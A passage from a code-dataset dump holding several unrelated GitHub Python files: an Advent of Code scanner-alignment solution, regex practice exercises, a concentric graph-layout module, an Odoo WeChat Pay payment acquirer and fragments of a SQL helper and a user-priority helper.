SELECT DISTINCT u.username, CONCAT(u.last_name, ' ', u.first_name) AS full_name, u.email\n FROM result_header rh\n JOIN users u on u.id = rh.user_id\n WHERE rh.date BETWEEN %s AND %s\n \"\"\"\n cursor.execute(query, (date_from, date_to))\n return cursor.fetchall(), date_from, date_to","repo_name":"xKeiro/Evangelion","sub_path":"data_manager/common_queries.py","file_name":"common_queries.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17468373486","text":"import re\nimport sys\nimport argparse\nimport math\n\nfrom collections import defaultdict, Counter\n\nimport sys\nsys.path.append('../')\n\nfrom executor import *\nfrom helpers import *\n\nfrom itertools import permutations, product, combinations\nimport numpy as np\n\ndef get_rotation_matrices():\n matrices = []\n\n for order in permutations([0, 1, 2]):\n\n signs = [[1, -1]] * 3\n\n for x, y, z in product(*signs):\n matrix = create_matrix(3, 3, 0)\n\n matrix[0][order[0]] = x\n matrix[1][order[1]] = y\n matrix[2][order[2]] = z\n\n if np.linalg.det(matrix) == 1:\n matrices.append(matrix)\n\n return matrices\n\ndef transform(distances, m):\n new = create_matrix(len(distances[0]), len(distances), [0, 0, 0])\n\n for i in range(len(distances)):\n for j in range(len(distances[0])):\n new[i][j] = list(np.matmul(m, distances[i][j]))\n\n return new\n\ndef count_matches(rowA, rowB):\n rowA = [tuple(element) for element in rowA]\n rowB = [tuple(element) for element in rowB]\n\n sA = set(rowA)\n sB = set(rowB)\n\n return len(sA.intersection(sB))\n\nclass Translation:\n def __init__(self, matrix, pos):\n self.matrix = matrix\n self.pos = pos\n\ndef extract_match(rowA, rowB):\n result = {}\n\n for i, a in enumerate(rowA):\n for j, b in enumerate(rowB):\n if a == b:\n return (i, j)\n\ndef diff(c1, c2):\n return [c1[i] - c2[i] for i in range(3)]\n\ndef add(c1, c2):\n return [c2[i] + c1[i] for i in range(3)]\n\ndef negate(c1):\n return [-c1[i] for i in range(3)]\n\ndef p1(raw, lines, sections, nums, *args, **kwargs):\n # Input parsing: store the measurements from each scanner in a multidimensional array\n beacons = []\n\n for section in sections:\n section = section[1:]\n\n row = []\n for line in section:\n row.append(stoil(line.split(',')))\n\n beacons.append(row)\n\n # Compute relative distances between all beacons: this is how we determine overlap\n # all_distances[i][j][k][l] represents the distances between beacons for scanner i under rotation j between beacons k and l\n all_distances = []\n\n # All 24 rotations are represnted by a 3x3 rotation matrix\n rm = get_rotation_matrices()\n\n for beacon in beacons:\n distances = create_matrix(len(beacon), len(beacon), [0, 0, 0])\n\n for i in range(len(beacon)):\n for j in range(len(beacon)):\n xdist = beacon[i][0] - beacon[j][0]\n ydist = beacon[i][1] - beacon[j][1]\n zdist = beacon[i][2] - beacon[j][2]\n\n distances[i][j] = [xdist, ydist,zdist]\n\n rotated_distances = [transform(distances, m) for m in rm]\n\n all_distances.append(rotated_distances)\n\n # When we find overlap, we record the way to convert between beacon coordiante systems\n # translations[i][j] stores the way to convert from beacon j to beacon i's coordinate system\n translations = create_matrix(len(beacons), len(beacons), None)\n\n # The number of matches required to consider the beacons sufficiently overlapped\n MATCH = 12\n\n # Iterate over every pair of scanners to identify overlaps between them\n for i in range(len(beacons)):\n first = all_distances[i][0]\n\n for j in range(i + 1, len(beacons)):\n second_all = all_distances[j]\n\n found = False\n\n # Iterate over all rotations of the second beacon's coordinate system\n for k, second in enumerate(second_all):\n m = rm[k]\n\n # Iterate over all rows in the two idstance matrices\n # Skip the final 11 (or MATCH-1) rows because 12 rows should match\n for fr in first[:-(MATCH-1)]:\n for sr in second[:-(MATCH-1)]:\n matches = count_matches(fr, sr)\n\n if matches == 12:\n # Determine the indices of two matching beacons\n a_idx, b_idx = extract_match(fr, sr)\n\n # Get coordinates of matching beacon relative to the first scanner\n first_beacon_A = beacons[i][a_idx]\n\n # Get coordinates of matching beacon, but transformed so that\n # both coordinate systems are in the same rotational frame\n first_beacon_B = np.matmul(m, beacons[j][b_idx])\n\n # Determine the position of the second scanner relative to the first\n posB = diff(first_beacon_A, first_beacon_B)\n\n # Determine the rotation matrix to go from A -> B instead of B -> A\n # This should just be the transpose since it's orthogonal\n inv_m = np.linalg.inv(m)\n\n # Determine the position of the first relative relative to the second\n inv_pos = np.matmul(inv_m, negate(posB))\n\n # Store the translations in the translation matrix\n translationA = Translation(m, posB)\n translationB = Translation(inv_m, inv_pos)\n\n translations[i][j] = translationA\n translations[j][i] = translationB\n\n print(f'Found match between {i} and {j} for rotation {k}')\n\n found = True\n break\n\n if found:\n break\n\n if found:\n break\n\n\n # We have a partial table of translations between scanners\n # We fill out the entire table so we have translations for all scanners relative to scanner 0\n changed = True\n while changed: # It is necessary to run this a couple times to fill everything in\n changed = False\n\n # Iterate over every cell in the translation matrix\n for i in range(len(translations)):\n for j in range(len(translations)):\n\n # If we find an existing translation, we leverage it to create other translations\n if i != j and translations[i][j] is not None:\n\n # Iterate over every column in row j to find translations we can leverage\n for k in range(len(translations)):\n\n # If we found a translation that will let us fill in a part of the table\n # We compute the translation\n if i != k and translations[j][k] is not None and translations[i][k] is None:\n # Leverage linear algebgra to chain the rotation matrices\n mat = np.matmul(translations[i][j].matrix, translations[j][k].matrix)\n\n pos = add(np.matmul(translations[i][j].matrix, translations[j][k].pos), translations[i][j].pos)\n\n translations[i][k] = Translation(mat, pos)\n changed = True\n print(f'Computed translation between {i} and {k}')\n\n # We throw all the final coordinates in a set to eliminate duplicates\n final = set()\n\n # Iterate over all the scanners to add their beacons relative to scanner 0\n for i, group in enumerate(beacons):\n # No translations needed for scanner 0\n if i == 0:\n for beacon in group:\n final.add(tuple(beacon))\n\n # Otherwise use the translation to place beacon locations relative to scanner 0 in set\n else:\n for beacon in group:\n trans = np.matmul(translations[0][i].matrix, beacon)\n trans = add(trans, translations[0][i].pos)\n\n final.add(tuple(trans))\n\n print(f'Total beacons: {len(final)}')\n\n # Also do part 2 since my solution is kinda slow\n # Just iterate over all the pairs of beacons to get the distances\n d = 0\n for i in range(1, len(beacons)):\n for j in range(i + 1, len(beacons)):\n dist_vec = diff(translations[0][i].pos, translations[0][j].pos)\n newd = int(sum([abs(elem) for elem in dist_vec]))\n\n d = max(d, newd)\n\n print(f'Maximum L-1 distance between beacons: {d}')\n\n return len(final), d\n\ndef p2(raw, lines, sections, nums, *args, **kwargs):\n ans = 0\n\n\n return ans\n\nrun_solutions(p1, p2)\n","repo_name":"sColin16/AoC","sub_path":"2021/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3914671211","text":"import re\r\r\n'''s=input()\r\r\np=' /?.!@#$%^&*() '\r\r\nif re.search(p,s):\r\r\n print(' not found ')\r\r\nelse:\r\r\n print(' found')\r\r\n\r\r\n#2\r\r\ns=input()\r\r\np=r'\\w+[ab]+\\w'\r\r\nif re.search(p,s):\r\r\n print(' match found ')\r\r\nelse:\r\r\n print(' not found')\r\r\n\r\r\n#3\r\r\n\r\r\ns=input()\r\r\np='exercise'\r\r\nc=0\r\r\nx=re.findall(p,s)\r\r\nfor i in x:\r\r\n c=c+1\r\r\nprint(c)\r\r\nl='rishi'\r\r\nprint(re.sub(p,l,s))\r\r\n\r\r\n#4\r\r\ns=['bush','fox','toy','cap','candy']\r\r\nl=[]\r\r\nfor i in s:\r\r\n if i.endswith('h',0,len(i)):\r\r\n i=i+'es'\r\r\n l.append(i)\r\r\n elif i.endswith('x',0,len(i)):\r\r\n i=i+'es'\r\r\n l.append(i)\r\r\n else:\r\r\n i=i+'s'\r\r\n l.append(i)\r\r\nprint(l)\r\r\n'''\r\r\n#5\r\r\nrk=[]\r\r\ns=['bush','fox','toy','cap','candy']\r\r\np1='[^aeiou][hxp]$'\r\r\np2='[^aeiou]y$'\r\r\nfor i in s:\r\r\n if re.search(p1,i):\r\r\n rk.append(i+'es')\r\r\n elif re.search(p2,i):\r\r\n rk.append(i[:len(i)-1]+'ies')\r\r\n else :\r\r\n rk.append(i+'s')\r\r\nprint(rk)\r\r\n'''\r\r\n#6\r\r\ns=input()\r\r\nl=[]\r\r\np1='cats'\r\r\np2='dogs'\r\r\nc=0\r\r\nx=re.findall(p1,s)\r\r\ny=re.findall(p2,s)\r\r\nfor i in x:\r\r\n c=c+1\r\r\nprint('cats',c)\r\r\nc=0\r\r\nfor i in y:\r\r\n c=c+1\r\r\nprint('dogs',c)\r\r\np3='[0-9]+'\r\r\nprint(re.findall(p3,s))\r\r\n'''\r\r\n#7\r\r\ns=input()\r\r\np1=r'[a-z]'\r\r\np2=r'[A-Z]'\r\r\np3=r'[ 0-9 ]'\r\r\np4=r'[@!#$&] '\r\r\nl=len(s)\r\r\nif (re.search(p1,s)) and (re.search(p2,s)) and (re.search(p3,s)) and (re.search(p4,s)) and (l>6) and (l<=12):\r\r\n print('valid')\r\r\nelse:\r\r\n print('not valid')\r\r\n","repo_name":"samikshasadana/python_codes","sub_path":"24sept.py","file_name":"24sept.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10278904728","text":"import numpy as np\nimport networkx as nx\nfrom numpy.lib.stride_tricks import sliding_window_view\nimport math\nimport pandas as pd\n\n\ndef get_ring_coord(n, R, offset=False):\n '''\n Place {n} nodes evenly along a circle of radius {R}.\n Arguments:\n - n (int): number of nodes\n - R (float): radius\n - offset (bool): shift angle by half a unit\n Returns:\n - x, y: two vectors -- one for the x position and one for the y\n '''\n theta = np.linspace(0, 2*np.pi - (2*np.pi/n), n)\n if offset:\n theta = theta + (np.pi/n)\n\n x = R * (np.sin(theta))\n y = R * (np.cos(theta))\n\n return x, y\n\n\n# Function to calculate the ring's radius given padding, number of nodes, and radius of each node\nbig_r = lambda n, r, p=0: n * (2*r + p) / (2*np.pi)\n\ndef even_number_method(n, r, layers=1):\n '''\n Get radius values for each layer given {n} nodes with {r} radius each.\n This method ensures the same number of nodes are in each layer.\n \n Returns:\n - R_arr: array of length {layers} for each radius\n - n_arr: array of length {layers} for number of nodes per layer\n '''\n n_arr = np.array([len(x) for x in np.array_split(np.zeros(n), layers)])\n n_arr = np.flip(n_arr) # Flip so the more remainders are outside\n \n # Initialize first radius where padding is 0\n # Add 2r/(n-1) to handle cases where {n} is small\n R_arr = np.repeat(big_r(n_arr[0], r) + 2*r/(n-1), layers)\n # The next radii go outwards linearly\n R_arr = np.array([x + i*(2*r) for i, x in enumerate(R_arr)])\n \n return R_arr, n_arr\n\n\ndef even_spacing_method(n_tot, n_fl_co, r):\n '''\n Get radius values for each layer given {n_tot} nodes with {r} radius each. \n The first layer is guaranteed to have at most {n_fl_co} nodes (number of first-layer cutoff).\n This method ensures each layer is tightly packed on its diameter, except the outermost one.\n \n This has the potential to be expanded on where n_fl_co is calculated with the outermost layer's\n spacing in mind. If that layer's spacing is too sparse, then n_fl_co can be iterated up or down.\n \n Returns:\n - R_arr: array of length {layers} for each radius\n - n_arr: array of length {layers} for number of nodes per layer\n '''\n n_fl = min(n_tot, n_fl_co)\n\n R_arr = [max(big_r(n_fl, r), 4*r)]\n\n n_arr = [n_fl]\n n_fitted = n_fl\n while n_fitted < n_tot:\n R_i = R_arr[-1] + 2*r\n\n outer_diam = R_i * 2 * np.pi\n i_fitted = outer_diam // (2*r)\n\n n_fitted += i_fitted\n n_arr.append(i_fitted)\n R_arr.append(R_i)\n\n # Last one needs special treatment\n n_arr[-1] = n_arr[-1] - (np.sum(n_arr) - n_tot)\n n_arr = [int(x) for x in n_arr]\n\n return R_arr, n_arr\n\n\ndef node_coords(R_arr, n_arr):\n '''\n Assign coordinate values for an array of {R_arr} ring radii -- each ring containing {n_arr[i]} nodes.\n Returns:\n - Xs, Ys: arrays of X and Y values each with length {n}\n '''\n\n Xs = []\n Ys = []\n offset = False\n for r, ns in zip(R_arr, n_arr):\n X, Y = get_ring_coord(ns, r, offset=offset)\n Xs.append(X)\n Ys.append(Y)\n offset = not offset\n\n Xs = np.concatenate(Xs)\n Ys = np.concatenate(Ys)\n \n return Xs, Ys\n\n\ndef get_xy(n, n_fl_co=20, r=1050, offset_x=0, offset_y=0):\n n_tot = int(n)\n n_fl_co = int(n_fl_co)\n r = float(r)\n\n assert n >= 0, f\"{n}: Total number of nodes must be an integer > 0\"\n assert n_fl_co > 0, f\"{n_fl_co}: At least 1 node in the first layer is required\"\n assert r > 0, f\"{r}: r must be a float > 0\"\n \n if n == 0:\n return None, None, None, None\n\n R_arr, n_arr = even_spacing_method(n_tot, n_fl_co, r)\n Xs, Ys = node_coords(R_arr, n_arr)\n \n Xs = Xs + offset_x\n Ys = Ys + offset_y\n\n return Xs, Ys, R_arr, n_arr\n\ndef SQ_layered_concentric(qnodes_df, qedges_df):\n # Sort the nodes by thickness to be arranged polarly\n query_id = qnodes_df[qnodes_df[\"depth\"] == 0].iloc[0][\"Id\"]\n\n nq1 = qedges_df[qedges_df.source == query_id][[\"target\", \"thickness\"]].rename(columns={\"target\": \"Id\"})\n nq2 = qedges_df[qedges_df.target == query_id][[\"source\", \"thickness\"]].rename(columns={\"source\": \"Id\"})\n\n nq_df = pd.concat([nq1, nq2])\n nq_df = nq_df.groupby(\"Id\").max().reset_index()\n qnodes_df = qnodes_df.merge(nq_df, on=\"Id\", how=\"left\")\n qnodes_df = qnodes_df.sort_values([\"depth\", \"thickness\"], ascending=[True, False])\n\n # Calculate x, y coordinates for each node\n Xs, Ys, _, __ = get_xy(len(qnodes_df)-1, n_fl_co=20, r=1050)\n Xs = [0] + list(Xs) # First index is 0 because it's the query node\n Ys = [0] + list(Ys)\n \n qnodes_df[\"lc_X\"] = Xs; qnodes_df[\"lc_Y\"] = Ys\n \n return qnodes_df\n \n\ndef layered_concentric(qnodes_df):\n qnodes_df = qnodes_df.sort_values(\"Type\", ascending=False)\n vc_nodes = qnodes_df.Type.value_counts()\n\n n_query = vc_nodes[\"Query\"]\n n_links = vc_nodes.sum() - vc_nodes[\"Query\"]\n\n # Compute X and Y for concentric layout\n Xs = []; Ys = []\n\n r1 = 250\n Xs_q, Ys_q, R_arr_q, n_arr_q = get_xy(n_query, r=r1)\n Xs.extend(Xs_q); Ys.extend(Ys_q)\n\n if n_links>0:\n r2 = 100\n n_fl_co_d = 2 * np.pi * (R_arr_q[-1] + 3*r1) / (2 * r2)\n Xs_d, Ys_d, R_arr_d, n_arr_d = get_xy(n_links, n_fl_co_d, r=r2)\n Xs.extend(Xs_d); Ys.extend(Ys_d)\n \n qnodes_df[\"lc_X\"] = Xs; qnodes_df[\"lc_Y\"] = Ys\n \n return qnodes_df\n\n\ndef assign_cluster(qedges_df, qnodes_df):\n ''' Assign each node to a query \"cluster\"\n Argument:\n qedges_df (pd.DataFrame): edge dataframe for query\n qnodes_df (pd.DataFrame): node dataframe for query\n Returns:\n qnodes_df (pd.DataFrame): updated nodes dataframe with extra \"clust\" column\n clust_sizes(pd.Series): size of each query cluster\n '''\n qnodes_df = qnodes_df.reset_index(drop=True)\n qedges_df = qedges_df.reset_index(drop=True)\n \n # Prepare the cluster column. Note: query nodes will have their own Id as their cluster.\n qnodes_df[\"clust\"] = qnodes_df[\"Id\"]\n\n qG = nx.from_pandas_edgelist(qedges_df, edge_attr=True, source=\"source\", target=\"target\", create_using=nx.Graph())\n adj_mat = nx.adjacency_matrix(qG, nodelist=qnodes_df[\"Id\"], weight=\"thickness\")\n\n # Get query and non-query nodes, construct query-non-query adjacency matrix\n queries = qnodes_df[qnodes_df[\"Type\"] == \"Query\"][\"Id\"]\n q_i = np.array(queries.index)\n nq_i = np.setdiff1d(range(len(qnodes_df)), q_i)\n adj_mat = adj_mat[np.ix_(nq_i, q_i)]\n\n # Divide columns by column sums to normalize over each query node's baseline \"popularity\"\n colsum = np.sum(adj_mat, axis=0)\n adj_mat = np.nan_to_num(adj_mat/colsum, 0)\n\n # Assign each non-query node to a query node\n assign = np.asarray(np.argmax(adj_mat, axis=1).squeeze()).squeeze()\n assign = queries.reset_index(drop=True)[assign] # Now want to index specific to the list of queries\n assign.index = nq_i\n qnodes_df.loc[nq_i,\"clust\"] = assign\n \n clust_sizes = qnodes_df.groupby(\"clust\").size().sort_values(ascending=False)\n \n # Sort nodes table to be in the order of assigning X and Y coordinates\n qnodes_df.clust = qnodes_df.clust.astype(\"category\")\n qnodes_df.clust = qnodes_df.clust.cat.set_categories(clust_sizes.index)\n qnodes_df = qnodes_df.sort_values([\"clust\", \"Type\"], ascending=[True, False]).reset_index(drop=True)\n \n return qnodes_df, clust_sizes\n\n\ndef cluster_xy(ring_R, Rs, offset=False, arr_family=False, denom=4):\n ''' Compute the center location of clusters given the radius of the current layer and variable cluster radii\n Arguments:\n ring_R (float): radius of the layer that the cluster should reside along\n Rs (arr): array of cluster radii\n offset (bool): stagger X and Y values to help visualization\n arr_family (bool): arrange clusters by family (avoids monotonic decreasing cluster size)\n denom (int): consider 1/{denom} of the total clusters as big (only applicable if gini coefficient not above threshold)\n Returns:\n cX, cY (arr): coordinates for each cluster at current layer\n '''\n # Calculate the circumference\n circ = ring_R*2*np.pi\n \n # Calculate number of nodes counted as big in family assignment\n gc = gini_coefficient(Rs)\n if gc > 0.3:\n n_big = np.sum(Rs > np.mean(Rs))\n else:\n n_big = math.floor(max(denom, len(Rs))/denom) #minimum of 1 big node\n \n #Get index for family-sorted Rs\n if arr_family:\n family = assign_family(Rs, n_big=n_big)\n family_idx = np.argsort(family)\n else: \n family_idx = np.arange(len(Rs))\n\n # Sort Rs by family\n Rs = Rs[family_idx]\n \n # The cumulative sum of sliding window sum (of radii) corresponds to the center locations along a linearized ring\n # Handle if there is only 1 R in Rs\n if len(Rs) == 1:\n Rs = np.insert(Rs, -1, 0)\n lin_centers = np.insert(np.cumsum(np.sum(sliding_window_view(Rs, window_shape = 2), axis = 1)), 0, 0)\n \n # Compute the remainder space within the layer and evenly distribute it as padding between clusters\n remainder = circ - (lin_centers[-1]+Rs[-1]+Rs[0])\n assert remainder >= 0, f\"Layer overcrowded: remainder of {remainder}\" # Check if remainder is negative\n remainder_pad = remainder / (len(Rs))\n \n # Push the centers by the remainder padding. Automatically accounts for inter-cluster padding.\n lin_centers = [lin_centers[i] + remainder_pad*i for i in range(len(lin_centers))]\n lin_centers = np.array(lin_centers) / circ\n lin_centers = lin_centers*2*np.pi\n \n # Restore original order\n lin_centers = lin_centers[np.argsort(-Rs)]\n \n # Stagger adjacent layers for readability (this is not the optimal way to do it)\n if not offset:\n cX = ring_R * np.cos(lin_centers)\n cY = ring_R * np.sin(lin_centers)\n else:\n cX = ring_R * np.cos(lin_centers+(np.pi/2))\n cY = -ring_R * np.sin(lin_centers+(np.pi/2))\n \n return cX, cY\n\n\ndef cluster_layer(clust_sizes, icp=10000, n_fl_co=20, r=1050, arr_family=False, denom=4):\n ''' Compute the coordinates for each cluster\n Arguments:\n clust_sizes (arr): how many nodes in each cluster\n icp (float): inter-cluster padding. How much each cluster should be spaced out\n **kwargs: for even_spacing_method (so, radius and number of first-layer cutoff)\n \n Returns:\n cXs, cYs (arr): coordinates for each cluster\n '''\n assert (np.array(clust_sizes) == -np.sort(-clust_sizes)).all(), \"Sort by descending first\"\n \n # First retrieve each cluster's radius\n R_maxes = []\n for n in clust_sizes:\n R_arr, n_arr = even_spacing_method(n, n_fl_co=n_fl_co, r=r)\n R_maxes.append(max(R_arr))\n R_maxes = np.array(R_maxes)\n\n # Initialize cluster membership and radii\n layer_assign = np.zeros(len(R_maxes))\n layer_assign[0] = 1\n R_arr = [0, R_maxes[0]+icp+R_maxes[1]]\n\n # Cumulative sum is used to track how many variable-radius nodes can fit in each layer\n layer = 2\n csum = np.cumsum((2*R_maxes) + icp)\n csum = csum - csum[0]\n \n cXs = [0]\n cYs = [0]\n\n offset = False # Used to improve visibility of adjacent layers\n # While at least one cluster has not been assigned yet...\n while np.product(layer_assign) == 0:\n curr_circ = 2*np.pi*R_arr[-1]\n\n # Greater than 0 because csum will be subtracted by the csum immediately exceeding current layer's capacity\n i_fit = (csum <= curr_circ) & (csum > 0)\n # Assign layer to the clusters that fit\n layer_assign[i_fit] = layer\n \n # Record the maximum radius fitting in the current layer to update the next layer's radius\n R_max_layer = max(R_maxes[np.where(i_fit)])\n \n # Get adjustment coordinate of cluster\n cX, cY = cluster_xy(R_arr[-1], R_maxes[i_fit], offset=offset, arr_family=arr_family, denom=denom)\n offset = not offset\n cXs.extend(cX); cYs.extend(cY)\n \n R_arr.append(R_arr[-1]+icp+R_max_layer)\n \n # Dummy way of avoiding error when loop probably met exit condition\n try:\n i_fit_max = max(np.squeeze(np.where(i_fit)))\n csum = csum - csum[i_fit_max] # Update csum to account for fitting the previous layer\n except:\n break\n \n layer += 1\n \n return cXs, cYs\n\ndef gini_coefficient(x):\n \"\"\"Compute Gini coefficient of array of values\"\"\"\n diffsum = 0\n for i, xi in enumerate(x[:-1], 1):\n diffsum += np.sum(np.abs(xi - x[i:]))\n return diffsum / (len(x)**2 * np.mean(x))\n\ndef assign_family(clust_sizes, n_big=3):\n ''' Assigns each cluster to a family\n Arguments:\n clust_sizes (arr): how many nodes in each cluster, sorted increasing to decreasing\n n_big (int): top n nodes to consider as \"big\"\n \n Returns:\n family (arr): int representing the family each cluster belongs to\n '''\n n_big = min(n_big, len(clust_sizes))\n n_tile = math.ceil(len(clust_sizes)/n_big)\n family = np.tile(np.arange(n_big), n_tile)[:len(clust_sizes)]\n return family\n\ndef cluster_layered_concentric(qnodes_df, qedges_df, r=100, icp=500, arr_family=False, denom=4):\n qnodes_df, clust_sizes = assign_cluster(qedges_df, qnodes_df)\n cXs, cYs = cluster_layer(clust_sizes-1, r=r, icp=icp, arr_family=arr_family, denom=denom)\n\n full_Xs = []; full_Ys = []\n for i in range(len(clust_sizes)):\n # First node is query node and center of cluster\n Xs, Ys, _, _ = get_xy(clust_sizes[i]-1, offset_x=cXs[i], offset_y=cYs[i], r=r)\n\n full_Xs.append(cXs[i]); full_Ys.append(cYs[i])\n if Xs is not None:\n full_Xs.extend(Xs); full_Ys.extend(Ys)\n \n qnodes_df[\"clc_X\"] = full_Xs; qnodes_df[\"clc_Y\"] = full_Ys\n \n return qnodes_df","repo_name":"micw42/verit-web","sub_path":"Visualization/layeredConcentric.py","file_name":"layeredConcentric.py","file_ext":"py","file_size_in_byte":13903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19699238902","text":"# -*- coding: utf-'8' \"-*-\"\nfrom openerp.addons.payment_weixin.controllers.main import WeixinController\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\nimport urlparse\nimport urllib2\nfrom lxml import etree\nimport random\nimport string\n\nimport util\nfrom openerp.addons.payment.models.payment_acquirer import ValidationError\nfrom openerp.http import request\nfrom openerp import api, fields, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass AcquirerWeixin(models.Model):\n _inherit = 'payment.acquirer'\n\n def _get_ipaddress(self):\n return self.ip_address\n\n @api.model\n def _get_providers(self):\n providers = super(AcquirerWeixin, self)._get_providers()\n providers.append(['weixin', 'weixin'])\n return providers\n\n weixin_appid = fields.Char(string='Weixin APPID', required_if_provider='weixin')\n weixin_mch_id = fields.Char(string=u'微信支付商户号', required_if_provider='weixin')\n weixin_key = fields.Char(string=u'API密钥', required_if_provider='weixin')\n weixin_secret = fields.Char(string='Weixin Appsecret', required_if_provider='weixin')\n ip_address = fields.Char(string='IP Address', required_if_provider='weixin')\n\n def _get_weixin_urls(self, environment):\n if environment == 'prod':\n return {\n 'weixin_url': 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n }\n else:\n return {\n 'weixin_url': 'https://api.mch.weixin.qq.com/pay/unifiedorder'\n }\n\n @api.one\n def _get_weixin_key(self):\n return self.weixin_key\n\n _defaults = {\n 'fees_active': False,\n }\n\n def json2xml(self, json):\n string = \"\"\n for k, v in json.items():\n string = string + \"<%s>\" % (k) + str(v) + \"\" % (k)\n\n return string\n\n def _try_url(self, request, tries=3, context=None):\n\n done, res = False, None\n while (not done and tries):\n try:\n res = urllib2.urlopen(request)\n done = True\n except urllib2.HTTPError as e:\n res = e.read()\n e.close()\n if tries and res and json.loads(res)['name'] == 'INTERNAL_SERVICE_ERROR':\n _logger.warning('Failed contacting Paypal, retrying (%s remaining)' % tries)\n tries = tries - 1\n if not res:\n pass\n # raise openerp.exceptions.\n result = res.read()\n res.close()\n return result\n\n def random_generator(self, size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join([random.choice(chars) for n in xrange(size)])\n\n @api.multi\n def weixin_form_generate_values(self, partner_values, tx_values):\n self.ensure_one()\n base_url = self.env['ir.config_parameter'].get_param('web.base.url')\n amount = int(tx_values.get('amount', 0) * 100)\n nonce_str = self.random_generator()\n\n weixin_tx_values = dict(tx_values)\n weixin_tx_values.update(\n {\n 'appid': self.weixin_appid,\n 'mch_id': self.weixin_mch_id,\n 'nonce_str': nonce_str,\n 'body': tx_values['reference'],\n 'out_trade_no': tx_values['reference'],\n 'total_fee': amount,\n 'spbill_create_ip': self._get_ipaddress(),\n 'notify_url': '%s' % urlparse.urljoin(base_url, WeixinController._notify_url),\n 'trade_type': 'NATIVE',\n 'product_id': tx_values['reference'],\n }\n )\n\n data_post = {}\n data_post.update(\n {\n 'appid': self.weixin_appid,\n 'mch_id': self.weixin_mch_id,\n 'nonce_str': nonce_str,\n 'body': tx_values['reference'],\n 'out_trade_no': tx_values['reference'],\n 'total_fee': amount,\n 'spbill_create_ip': self._get_ipaddress(),\n 'notify_url': '%s' % urlparse.urljoin(base_url, WeixinController._notify_url),\n 'trade_type': 'NATIVE',\n 'product_id': tx_values['reference'],\n }\n )\n\n _, prestr = util.params_filter(data_post)\n weixin_tx_values['sign'] = util.build_mysign(prestr, self.weixin_key, 'MD5')\n data_post['sign'] = weixin_tx_values['sign']\n\n data_xml = \"\" + self.json2xml(data_post) + \"\"\n\n url = self._get_weixin_urls(self.environment)['weixin_url']\n\n request = urllib2.Request(url, data_xml)\n result = self._try_url(request, tries=3)\n\n _logger.info(\"request to %s and the request data is %s, and request result is %s\" % (url, data_xml, result))\n return_xml = etree.fromstring(result)\n\n if return_xml.find('return_code').text == \"SUCCESS\" and return_xml.find('code_url').text != False:\n qrcode = return_xml.find('code_url').text\n weixin_tx_values['qrcode'] = qrcode\n else:\n return_code = return_xml.find('return_code').text\n return_msg = return_xml.find('return_msg').text\n raise ValidationError(\"%s, %s\" % (return_code, return_msg))\n\n return partner_values, weixin_tx_values\n\n @api.multi\n def weixin_get_form_action_url(self):\n self.ensure_one()\n return self._get_weixin_urls(self.environment)['weixin_url']\n\n\nclass TxWeixin(models.Model):\n _inherit = 'payment.transaction'\n\n weixin_txn_id = fields.Char(string='Transaction ID')\n weixin_txn_type = fields.Char(string='Transaction type')\n\n\n # --------------------------------------------------\n # FORM RELATED METHODS\n # --------------------------------------------------\n\n def _weixin_form_get_tx_from_data(self, data):\n reference, txn_id = data.get('out_trade_no'), data.get('out_trade_no')\n if not reference or not txn_id:\n error_msg = 'weixin: received data with missing reference (%s) or txn_id (%s)' % (reference, txn_id)\n _logger.error(error_msg)\n raise ValidationError(error_msg)\n\n # find tx -> @TDENOTE use txn_id ?\n tx_ids = self.search([('reference', '=', reference)])\n if not tx_ids or len(tx_ids) > 1:\n error_msg = 'weixin: received data for reference %s' % (reference)\n if not tx_ids:\n error_msg += '; no order found'\n else:\n error_msg += '; multiple order found'\n _logger.error(error_msg)\n raise ValidationError(error_msg)\n return tx_ids[0]\n\n def _weixin_form_validate(self, tx, data):\n status = data.get('trade_state')\n data = {\n 'acquirer_reference': data.get('out_trade_no'),\n 'weixin_txn_id': data.get('out_trade_no'),\n 'weixin_txn_type': data.get('fee_type'),\n\n }\n\n if status == 0:\n _logger.info('Validated weixin payment for tx %s: set as done' % (tx.reference))\n data.update(state='done', date_validate=data.get('time_end', fields.datetime.now()))\n return tx.write(data)\n\n else:\n error = 'Received unrecognized status for weixin payment %s: %s, set as error' % (tx.reference, status)\n _logger.info(error)\n data.update(state='error', state_message=error)\n return tx.write(data)\n","repo_name":"vnsofthe/odoo-dev","sub_path":"addons/payment_weixin/models/weixin.py","file_name":"weixin.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"23860300378","text":"from tx2.UserReg.models import Priority\nfrom tx2.UserReg.DBFunctions.DBFunctions import DBUpdatePriority, DBInsertPriority\nfrom tx2.Users.models import Group, User\nclass PriorityFnx():\n def updatePriority(self, ContentType, Record,UserGroup, PriorityVal, Desc,by,ip ):\n try:\n if(PriorityVal=='Default'):\n PriorityVal=1\n \n details={\n 'ContentType':ContentType, \n 'Record': Record,\n 'Group': UserGroup,\n 'Priority':PriorityVal,\n 'Desc':Desc,\n 'RequestedOperation':'SYSTEM_PERMISSION_UPDATE',\n 'ByUser':by,\n 'ip':ip,\n 'LogsDesc':\"Update\"\n }\n res= DBUpdatePriority(details)\n return res\n except:\n error_message= \"Error @ updatePriority in Business Function\"\n self.CommunicationLogger.exception('[%s] == Exception =='%('updatePriority'))\n return (-5, error_message)\n def setPriority(self, ContentType, Record,UserGroup, PriorityVal, Desc,by,ip ):\n try:\n if(PriorityVal=='Default'):\n PriorityVal=1\n \n details={\n 'ContentType':ContentType, \n 'Record': Record,\n 'Group': UserGroup,\n 'Priority':PriorityVal,\n 'Desc':Desc,\n 'RequestedOperation':'SYSTEM_PERMISSION_INSERT',\n 'ByUser':by,\n 'ip':ip\n }\n res= DBInsertPriority(details)\n return res\n except:\n error_message= \"Error @ setPriority in Business Function\"\n 